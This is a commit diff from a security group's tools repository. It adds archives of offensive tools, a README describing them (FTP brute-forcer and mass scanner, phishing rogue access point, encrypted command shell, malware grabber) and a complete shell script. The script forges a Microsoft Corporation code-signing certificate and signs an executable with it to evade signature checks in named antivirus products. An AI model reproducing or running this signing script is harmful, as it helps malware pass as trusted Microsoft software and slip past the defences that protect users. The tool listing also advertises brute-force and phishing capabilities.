hackerhouse-opensource
diff --git a/‎ApacheProbe.zip‎
7.87 KB b/‎ApacheProbe.zip‎
7.87 KB
diff --git a/‎CryptCmd.zip‎
1.55 MB b/‎CryptCmd.zip‎
1.55 MB
diff --git a/‎DSIHello.tgz‎
16.5 KB b/‎DSIHello.tgz‎
16.5 KB
diff --git a/‎FTPCracker.rar‎
3.17 MB b/‎FTPCracker.rar‎
3.17 MB
diff --git a/‎FTPScanner.rar‎
3.17 MB b/‎FTPScanner.rar‎
3.17 MB
diff --git a/‎README.md‎
Lines changed: 29 additions & 0 deletions b/‎README.md‎
Lines changed: 29 additions & 0 deletions
diff --git a/‎SCRABBLE-wordlist.tgz‎
3 MB b/‎SCRABBLE-wordlist.tgz‎
3 MB
diff --git a/‎android-malware-grabber.tgz‎
671 Bytes b/‎android-malware-grabber.tgz‎
671 Bytes
diff --git a/‎bypassavp.sh‎
Lines changed: 21 additions & 0 deletions b/‎bypassavp.sh‎
Lines changed: 21 additions & 0 deletions
diff --git a/‎combipass.tar.gz‎
9.23 KB b/‎combipass.tar.gz‎
9.23 KB
@@ -0,0 +1,29 @@
+# tools
+
+Utilities and tools created during computer security research activities by the team at Hacker House.
+
+| Filename | Description |
+| :--- | :--- |
+| *android-malware-grabber.tgz* | Android emulator tool to download new malware from the web |
+| *ApacheProbe.zip* | tool to perform Apache userdir enumeration (ASM) |
+| *bypassavp.sh*  | Sign an executable with a fake Microsoft certificate to evade PSP |
+| *combipass.tar.gz* | Creates combination files for password cracking from textfiles |
+| *CryptCmd.zip* | SSL encrypted command shell tool for Windows |
+| *diceware.tgz* | diceware password generation tool |
+| *DSIHello.tgz* | Apple DSI protocol enumeration tool (Apple File Sharing) |
+| *elf-bintools.tgz* | ELF binary tools 
+| *FTPCracker.rar* | FTP server brute-force tool (GUI)
+| *FTPScanner.rar* | FTP mass-scanner tool (GUI)
+| *mac-teensyduino.txt* | OS-X 10.6.5 teensyduino command shell injection tool |
+| *net-tools.tgz* | PHP tools for common network enumeration |
+| *nsediscover-kali.py* | Nmap script discovery tool (kali edition) |
+| *nsediscover.py* | Nmap script discovery tool (Linux) |
+| *rebirth.ipa* | Apple IOS 11.3.x jailbreak tool with SSH | 
+| *rfsniff.tgz* | HackRF complex signal baseband tool (ncurses) |
+| *rogueap.tgz* | LinkSys router malicious access point for phishing | 
+| *rosetta.db* | Rosetta Stone database in SQLite format for UNIX administrators |
+| *SCRABBLE-wordlist.tgz* | Scrabble dictionary wordlist for password cracking | 
+| *spybot-0.3a.zip* | IRC monitoring chat bot for "NSA" type capabiltiies |
+
+These files are available under a Attribution-NonCommercial-NoDerivatives 4.0 International license.
+
@@ -0,0 +1,21 @@
+#!/bin/sh
+# Sign an executable with a fake Microsoft certificate to evade PSP
+# Uses a fake Microsoft certificate as exploited by Petya/NotPetya
+# ransomware to bypass signature (not heuristic) checks on the following
+# AvP products:
+# * TrendMicro
+# * Webroot
+# * Malwarebytes
+# * Arcabit
+# * Zonealarm
+# * Kaspersky
+#
+# Use with AppName Exe and enter password on the prompt. Requires
+# mono framework installed to use "codesign" on Linux.
+#
+# e.g. ./bypass.sh SomeApp server.exe
+openssl req -x509 -newkey rsa:4096 -keyout fake_microsoft_key.pem -out fake_microsoft_cert.pem -days 365 -subj "/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=MOPR/CN=Microsoft Corporation" 
+openssl rsa -in fake_microsoft_key.pem -outform PVK -pvk-strong -out authenticode.pvk 
+openssl crl2pkcs7 -nocrl -certfile fake_microsoft_cert.pem -outform DER -out authenticode.spc
+signcode -spc authenticode.spc -v authenticode.pvk  -a sha1 -\$ commercial -n $1 -i http://www.microsoft.com/ -i http://timestamp.verisign.com/scripts/timestamp.dll -tr 10 $2
+